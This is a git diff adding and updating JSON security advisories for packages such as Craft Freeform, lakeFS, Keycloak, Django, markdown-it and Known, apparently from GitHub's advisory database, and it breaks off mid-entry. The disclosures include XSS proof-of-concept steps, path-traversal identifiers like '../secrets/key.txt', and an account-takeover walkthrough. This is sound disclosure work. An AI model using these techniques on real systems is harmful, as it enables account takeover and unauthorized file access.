diff --git a/advisories/github-reviewed/2025/03/GHSA-3jxr-23ph-c89g/GHSA-3jxr-23ph-c89g.json b/advisories/github-reviewed/2025/03/GHSA-3jxr-23ph-c89g/GHSA-3jxr-23ph-c89g.json
index 7fb728d6c73bb..c544e6b1f1382 100644
--- a/advisories/github-reviewed/2025/03/GHSA-3jxr-23ph-c89g/GHSA-3jxr-23ph-c89g.json
+++ b/advisories/github-reviewed/2025/03/GHSA-3jxr-23ph-c89g/GHSA-3jxr-23ph-c89g.json
@@ -1,13 +1,12 @@
{
"schema_version": "1.4.0",
"id": "GHSA-3jxr-23ph-c89g",
- "modified": "2025-06-03T17:32:56Z",
+ "modified": "2026-02-13T20:52:09Z",
"published": "2025-03-04T18:33:43Z",
- "aliases": [
- "CVE-2025-23368"
- ],
- "summary": "Wildfly Elytron integration susceptible to brute force attacks via CLI",
- "details": "A flaw was found in Wildfly Elytron integration. The component does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it more susceptible to brute force attacks via CLI.",
+ "withdrawn": "2026-02-13T20:52:09Z",
+ "aliases": [],
+ "summary": "Duplicate Advisory: Wildfly Elytron integration susceptible to brute force attacks via CLI",
+ "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qhp6-6p8p-2rqh. This link is maintained to preserve external references.\n\n### Original Description\nA flaw was found in Wildfly Elytron integration. The component does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it more susceptible to brute force attacks via CLI.",
"severity": [
{
"type": "CVSS_V3",
diff --git a/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json b/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json
index fa33bbc866cc0..f090ff0e06d20 100644
--- a/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json
+++ b/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json
@@ -1,9 +1,11 @@
{
"schema_version": "1.4.0",
"id": "GHSA-jp3q-wwp3-pwv9",
- "modified": "2026-02-10T13:47:10Z",
+ "modified": "2026-02-13T14:57:31Z",
"published": "2026-01-22T21:41:14Z",
- "aliases": [],
+ "aliases": [
+ "CVE-2026-26188"
+ ],
"summary": "Freeform Craft Plugin CP UI (builder/integrations) has Stored Cross-Site Scripting (XSS) issue",
"details": "**Summary**\nAn authenticated, low-privilege user (able to create/edit forms) can inject arbitrary HTML/JS into the Craft Control Panel (CP) builder and integrations views. User-controlled form labels and integration metadata are rendered with `dangerouslySetInnerHTML` without sanitization, leading to stored XSS that executes when any admin views the builder/integration screens.\n\n**Affected Product**\n- Ecosystem: Packagist (Craft CMS plugin)\n- Package: solspace/craft-freeform\n- Version: <= 5.14.6 (latest observed). Likely all 5.x until patched.\n\n**Details**\n- Root cause: Multiple user-controlled strings (field labels, section labels, integration icons, short names, WYSIWYG previews) are injected into React components using `dangerouslySetInnerHTML` without sanitization.\n- Evidence: `dangerouslySetInnerHTML` on user-controlled properties in bundled CP JS at [packages/plugin/src/Resources/js/client/client.js](packages/plugin/src/Resources/js/client/client.js#L1).\n\n**PoCs**\n- Label-based XSS:\n 1. In Craft CP, create/edit a Freeform field and set its label to `
`.\n 2. Open the form builder view containing the field.\n 3. Alert executes (stored XSS).\n- Integration icon SVG:\n 1. Set an integration \"icon SVG\" to ``.\n 2. Open the integrations CP view.\n 3. Script executes.\n\n**Impact**\nArbitrary JS in admin CP; session/CSRF token theft; potential full admin takeover via DOM-driven actions.\n\n**Remediation**\n- Sanitize/HTML-encode all user-controlled strings before passing to `dangerouslySetInnerHTML`, or avoid it for labels/titles/icons.\n- Server-side: strip/escape disallowed tags on save for fields, integration metadata, WYSIWYG content.\n- Add regression tests with `![]()
` payloads to ensure no execution in builder/integration views.\n\n**Workarounds**\n- Restrict form-edit permissions to trusted admins only until patched.\n- Consider CSP that disallows inline scripts (defense-in-depth only).\n\n**Credits**\n- Discovered by https://www.linkedin.com/in/praveenkavinda/ | Prav33N-Sec.",
"severity": [
@@ -41,9 +43,21 @@
"type": "WEB",
"url": "https://github.com/solspace/craft-freeform/security/advisories/GHSA-jp3q-wwp3-pwv9"
},
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26188"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/solspace/craft-freeform/commit/b9adad6cdf1eba5400aae8b1ae39bd7d4d33af5e"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/solspace/craft-freeform"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/solspace/craft-freeform/releases/tag/v5.14.7"
}
],
"database_specific": {
@@ -53,6 +67,6 @@
"severity": "LOW",
"github_reviewed": true,
"github_reviewed_at": "2026-01-22T21:41:14Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-12T23:16:09Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/01/GHSA-wv3h-x6c4-r867/GHSA-wv3h-x6c4-r867.json b/advisories/github-reviewed/2026/01/GHSA-wv3h-x6c4-r867/GHSA-wv3h-x6c4-r867.json
index 9b5fa17ff0a3b..a6f24f73aa131 100644
--- a/advisories/github-reviewed/2026/01/GHSA-wv3h-x6c4-r867/GHSA-wv3h-x6c4-r867.json
+++ b/advisories/github-reviewed/2026/01/GHSA-wv3h-x6c4-r867/GHSA-wv3h-x6c4-r867.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-wv3h-x6c4-r867",
- "modified": "2026-02-10T13:47:26Z",
+ "modified": "2026-02-13T20:24:37Z",
"published": "2026-01-21T09:31:30Z",
"aliases": [
"CVE-2025-14559"
@@ -25,7 +25,7 @@
"type": "ECOSYSTEM",
"events": [
{
- "introduced": "0"
+ "introduced": "26.5.0"
},
{
"fixed": "26.5.2"
@@ -33,6 +33,25 @@
]
}
]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.keycloak:keycloak-services"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "26.4.9"
+ }
+ ]
+ }
+ ]
}
],
"references": [
@@ -44,6 +63,10 @@
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/issues/45651"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/keycloak/keycloak/commit/2d0aa31c4830ebaad094c3762e78b884c141e659"
+ },
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/commit/d67349f3aa9fed5c61750619d0f9de6356aeaeff"
diff --git a/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json
new file mode 100644
index 0000000000000..e6959febeead2
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json
@@ -0,0 +1,66 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-27jp-wm6q-gp25",
+ "modified": "2026-02-13T16:16:11Z",
+ "published": "2026-02-13T16:16:11Z",
+ "aliases": [],
+ "summary": "sqlparse: formatting list of tuples leads to denial of service",
+ "details": "### Summary\nThe below gist hangs while attempting to format a long list of tuples.\n\nThis was found while [drafting a regression test for Dja\nngo 5.2's composite primary key feature](https://code.djangoproject.com/ticket/36416#comment:3), which allows querying composite fields with tuples.\n\n###",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "sqlparse"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.5.4"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.5.3"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-27jp-wm6q-gp25"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/andialbrecht/sqlparse/commit/40ed3aa958657fa4a82055927fa9de70ab903360"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/andialbrecht/sqlparse"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/andialbrecht/sqlparse/releases/tag/0.5.4"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-770"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T16:16:11Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json b/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
new file mode 100644
index 0000000000000..2dd1016e60662
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2xf7-hmf6-p64j",
+ "modified": "2026-02-13T20:55:54Z",
+ "published": "2026-02-13T12:31:21Z",
+ "aliases": [
+ "CVE-2026-20796"
+ ],
+ "summary": "Mattermost doesn't properly validate channel membership at the time of data retrieval",
+ "details": "Mattermost versions 10.11.x <= 10.11.9 fail to properly validate channel membership at the time of data retrieval which allows a deactivated user to learn team names they should not have access to via a race condition in the /common_teams API endpoint.. Mattermost Advisory ID: MMSA-2025-00549",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "10.11.0"
+ },
+ {
+ "fixed": "10.11.10"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 10.11.9"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20796"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mattermost/mattermost"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mattermost.com/security-updates"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-367"
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:55:54Z",
+ "nvd_published_at": "2026-02-13T11:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json
index a06c125cd8919..c2459ea5cf20f 100644
--- a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json
+++ b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-33mh-2634-fwr2",
- "modified": "2026-02-12T14:22:46Z",
+ "modified": "2026-02-13T17:16:36Z",
"published": "2026-02-09T20:37:05Z",
"aliases": [
"CVE-2026-25765"
diff --git a/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json b/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json
index 65e255a2c2b57..3979b68093b3c 100644
--- a/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json
+++ b/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-37gf-gmxv-74wv",
- "modified": "2026-02-10T18:35:15Z",
+ "modified": "2026-02-13T21:49:42Z",
"published": "2026-02-09T21:31:03Z",
"aliases": [
"CVE-2026-1486"
@@ -25,7 +25,7 @@
"type": "ECOSYSTEM",
"events": [
{
- "introduced": "0"
+ "introduced": "26.5.0"
},
{
"fixed": "26.5.3"
@@ -33,6 +33,25 @@
]
}
]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.keycloak:keycloak-services"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "26.4.9"
+ }
+ ]
+ }
+ ]
}
],
"references": [
@@ -52,6 +71,10 @@
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/commit/176dc8902ce552056d3648c4601d519afc6fb043"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/keycloak/keycloak/commit/8316e8538f0037d9f998181e73122cff93a94035"
+ },
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:2365"
diff --git a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
similarity index 67%
rename from advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
rename to advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
index 89a716520ae70..8d068ccd0ebf8 100644
--- a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
+++ b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
@@ -1,11 +1,12 @@
{
"schema_version": "1.4.0",
"id": "GHSA-38c4-r59v-3vqw",
- "modified": "2026-02-12T06:30:13Z",
+ "modified": "2026-02-13T20:04:39Z",
"published": "2026-02-12T06:30:13Z",
"aliases": [
"CVE-2026-2327"
],
+ "summary": "markdown-it is has a Regular Expression Denial of Service (ReDoS)",
"details": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.",
"severity": [
{
@@ -14,10 +15,30 @@
},
{
"type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "markdown-it"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "13.0.0"
+ },
+ {
+ "fixed": "14.1.1"
+ }
+ ]
+ }
+ ]
}
],
- "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +52,13 @@
"type": "WEB",
"url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917"
},
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/markdown-it/markdown-it"
+ },
{
"type": "WEB",
- "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs%23L33"
+ "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs#L33"
},
{
"type": "WEB",
@@ -45,8 +70,8 @@
"CWE-1333"
],
"severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:04:39Z",
"nvd_published_at": "2026-02-12T06:16:02Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json
index a760766599ba5..4ca15dfff45b2 100644
--- a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json
+++ b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-6426-9fv3-65x8",
- "modified": "2026-02-03T19:35:57Z",
+ "modified": "2026-02-13T19:55:25Z",
"published": "2026-02-03T15:30:24Z",
"aliases": [
"CVE-2026-1312"
@@ -10,8 +10,8 @@
"details": "An issue was discovered in 6.0 before 6.0.2, 5.2 before 5.2.11, and 4.2 before 4.2.28.\n\n`.QuerySet.order_by()` is subject to SQL injection in column aliases containing periods when the same alias is, using a suitably crafted dictionary, with dictionary expansion, used in `FilteredRelation`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\n\nDjango would like to thank Solomon Kebede for reporting this issue.",
"severity": [
{
- "type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
}
],
"affected": [
@@ -107,7 +107,7 @@
"cwe_ids": [
"CWE-89"
],
- "severity": "HIGH",
+ "severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2026-02-03T19:35:56Z",
"nvd_published_at": "2026-02-03T15:16:13Z"
diff --git a/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json
new file mode 100644
index 0000000000000..d32cbf85ee211
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json
@@ -0,0 +1,72 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-699m-4v95-rmpm",
+ "modified": "2026-02-13T22:11:49Z",
+ "published": "2026-02-13T16:16:04Z",
+ "aliases": [
+ "CVE-2026-26187"
+ ],
+ "summary": "lakeFS vulnerable to path traversal in local block adapter allow cross-namespace and sibling directory access",
+ "details": "## Summary\n\nTwo path traversal vulnerabilities in the local block adapter allow authenticated users to read and write files outside their designated storage boundaries.\n\n## Details\n\nThe local block adapter in `pkg/block/local/adapter.go` had two path traversal vulnerabilities:\n\n### 1. Prefix Bypass Vulnerability\n\nThe `verifyRelPath` function used `strings.HasPrefix()` to verify that requested paths fall within the configured storage directory. This check was insufficient because it validated only the path prefix without requiring a path separator, allowing access to sibling directories with similar names.\n\n**Example:** If the adapter is configured with base path `/data/lakefs`:\n\n| Path | Expected | Actual |\n|------|----------|--------|\n| `/data/lakefs/valid/file.txt` | Allowed | Allowed |\n| `/data/lakefs_evil/secret.txt` | Blocked | **Vulnerable** |\n| `/data/lakefs_backup/data.db` | Blocked | **Vulnerable** |\n\n### 2. Namespace Escape via Identifier\n\nThe adapter verified that resolved paths stayed within the adapter's base path, but did not verify that object identifiers stayed within their designated storage namespace. This allowed attackers to use path traversal sequences in the object identifier to access files in other namespaces.\n\n**Example:** With base path `/data/lakefs` and namespace `local://repo1/userdata`:\n\n| Identifier | Resolved Path | Expected | Actual |\n|------------|---------------|----------|--------|\n| `file.txt` | `/data/lakefs/repo1/userdata/file.txt` | Allowed | Allowed |\n| `../secrets/key.txt` | `/data/lakefs/repo1/secrets/key.txt` | Blocked | **Vulnerable** |\n| `../../other-repo/data.txt` | `/data/lakefs/other-repo/data.txt` | Blocked | **Vulnerable** |\n\nThis vulnerability allows users with access to one namespace to read and write files in other namespaces within the same lakeFS deployment.\n\n## Impact\n\nAuthenticated lakeFS users can:\n\n- **Read and write files in sibling directories** that share the same path prefix as the storage directory (vulnerability 1)\n- **Access files across namespaces** by using path traversal in object identifiers (vulnerability 2)\n\nThis could allow attackers to:\n\n- Read sensitive data from other repositories/namespaces\n- Write malicious files to other namespaces\n- Read/write files in adjacent directories outside lakeFS storage\n- Potentially escalate privileges if writable directories are used by other services\n\nThis vulnerability **only affects** deployments using the local block adapter. Deployments using S3, GCS, Azure, or other object storage backends are **not affected**.\n\n## Patches\n\nFixed in version v1.77.0.\n\nThe fixes:\n1. Append a path separator to prefix checks, ensuring paths must be within the storage directory\n2. Add two-level path validation: verify both that namespace paths stay within the adapter's base path AND that resolved paths stay within their designated namespace\n\n## Workarounds\n\n- Configure the storage path with a unique name unlikely to be a prefix of other directories\n- Restrict filesystem permissions for the lakeFS process\n- Ensure no sensitive data exists in sibling directories\n\n## Credit\n\nDiscovered via CodeQL static analysis.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/treeverse/lakefs"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.77.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.76.0"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/treeverse/lakeFS/security/advisories/GHSA-699m-4v95-rmpm"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26187"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/treeverse/lakeFS/commit/cbc106275357302a834280f133265dc39f1384ce"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/treeverse/lakeFS"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/treeverse/lakeFS/releases/tag/v1.77.0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T16:16:04Z",
+ "nvd_published_at": "2026-02-13T19:17:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-7587-4wv6-m68m/GHSA-7587-4wv6-m68m.json b/advisories/github-reviewed/2026/02/GHSA-7587-4wv6-m68m/GHSA-7587-4wv6-m68m.json
new file mode 100644
index 0000000000000..2497c081ff318
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-7587-4wv6-m68m/GHSA-7587-4wv6-m68m.json
@@ -0,0 +1,63 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7587-4wv6-m68m",
+ "modified": "2026-02-13T20:54:19Z",
+ "published": "2026-02-13T20:54:19Z",
+ "aliases": [],
+ "summary": "rPGP vulnerable to parser crash on crafted RSA secret key packets through CVE-2026-21895",
+ "details": "### Summary\nIt was possible to trigger an unhandled edge case in the Rust Crypto rsa crate through rPGP packet parsing functionality, and crash the process that runs rPGP. This problem has been patched in a new rsa version. The new release of rPGP ensures a patched version of the rsa crate is in use, which prevents this issue.\n\n### Details\nWhile parsing a special RSA secret key packet, rPGP calls the rsa crate with the provided key. On vulnerable versions, this results in a Rust \"panic\" during key construction. Note that an attacker can trigger this situation even in places where applications don't expect to handle foreign key material, for example while attempting to receive a message.\n\nFor more information on the rsa crate vulnerability, see https://github.com/RustCrypto/RSA/security/advisories/GHSA-9c48-w39g-hm26 and https://github.com/RustCrypto/RSA/pull/624.\nIn rPGP, this has been fixed via https://github.com/rpgp/rpgp/pull/698.\n\n### Impact\nThis issue impacts availability (i.e. applications can crash).\n\nAffected rPGP versions: rPGP 0.16.0-alpha.0 to 0.18.0\nVulnerable rsa versions: all before version 0.9.10\n\n### Workaround\nThe issue depends on the combination of affected rPGP and rsa versions. Users of affected rPGP versions can pin the patched rsa 0.9.10 via a cargo lockfile to mitigate the issue.\n\n### Attribution\nDiscovered by Christian Reitter from Radically Open Security during a security review for Proton AG.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "pgp"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.16.0-alpha.0"
+ },
+ {
+ "fixed": "0.19.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/security/advisories/GHSA-7587-4wv6-m68m"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/pull/698"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/commit/38efa49ce18b3821649de9cd8dea88a959b833a5"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/rpgp/rpgp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-703"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:54:19Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-78wq-6gcv-w28r/GHSA-78wq-6gcv-w28r.json b/advisories/github-reviewed/2026/02/GHSA-78wq-6gcv-w28r/GHSA-78wq-6gcv-w28r.json
new file mode 100644
index 0000000000000..f2f83fffa5cb2
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-78wq-6gcv-w28r/GHSA-78wq-6gcv-w28r.json
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-78wq-6gcv-w28r",
+ "modified": "2026-02-13T22:49:27Z",
+ "published": "2026-02-13T22:49:27Z",
+ "aliases": [
+ "CVE-2026-26273"
+ ],
+ "summary": "Known affected by Account Takeover via Password Reset Token Leakage",
+ "details": "### Summary\nA Critical Broken Authentication vulnerability exists in Known 1.6.2. The application leaks the password reset token within a hidden HTML input field on the password reset page. This allows any unauthenticated attacker to retrieve the reset token for any user by simply querying the user's email, leading to full Account Takeover (ATO) without requiring access to the victim's email inbox.\n\n### Details\nThe vulnerability occurs within the password reset flow. When a reset is requested, the application generates a verification code. However, the subsequent reset page (/account/password/reset/) incorrectly reflects this code back to the client in the HTML source code.\n\nSpecifically, the sensitive token is embedded in:\n\n\nBecause this page is accessible via a GET request using the victim's email as a parameter, an attacker can programmatically extract the token.\n\n### PoC\n1. The attacker asks for a password reset for the victim\n\n![\"image\"](\"https://github.com/user-attachments/assets/0197907e-f10b-4e6d-989e-f25c408862cd\")
\n\n![\"image(1)\"](\"https://github.com/user-attachments/assets/9a317b27-b56a-4663-9965-d3e660713f4e\")
\n\n\n2. The attacker makes the following curl command on the terminal using the victim's email, and is able to get the code that was sent as an hidden field in the HTML.\n![\"image(2)\"](\"https://github.com/user-attachments/assets/af89ba3b-de56-4437-84b3-c1feb56d2348\")
\n\n3. With this code, the attacker is able to use it in order to reset the victim password.\n![\"image(3)\"](\"https://github.com/user-attachments/assets/498b8a2e-9eb2-4b50-bc35-26b0f2764c8d\")
\n\n![\"image(4)\"](\"https://github.com/user-attachments/assets/d1304dc3-bf56-4ec7-920c-ecce502db6b0\")
\n\n4. The attacker is able to login with the new password.\n\n![\"image(5)\"](\"https://github.com/user-attachments/assets/2533032e-6f0d-45c8-9fe1-881bfedebcc4\")
\n\n![\"image(6)\"](\"https://github.com/user-attachments/assets/a6e9144c-cc96-493d-8780-9156c299a192\")
\n\n\n\n### Impact\n- An attacker can compromise any account on the platform, including administrative accounts, resulting in total loss of Confidentiality, Integrity, and Availability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "idno/known"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.6.3"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.6.2"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/idno/known/security/advisories/GHSA-78wq-6gcv-w28r"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/idno/known/commit/8439a0747471559fb1ea9f074b929d390f27e66a"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/idno/known"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/idno/known/releases/tag/1.6.3"
+ }
+ ],
+ "database_specific": {
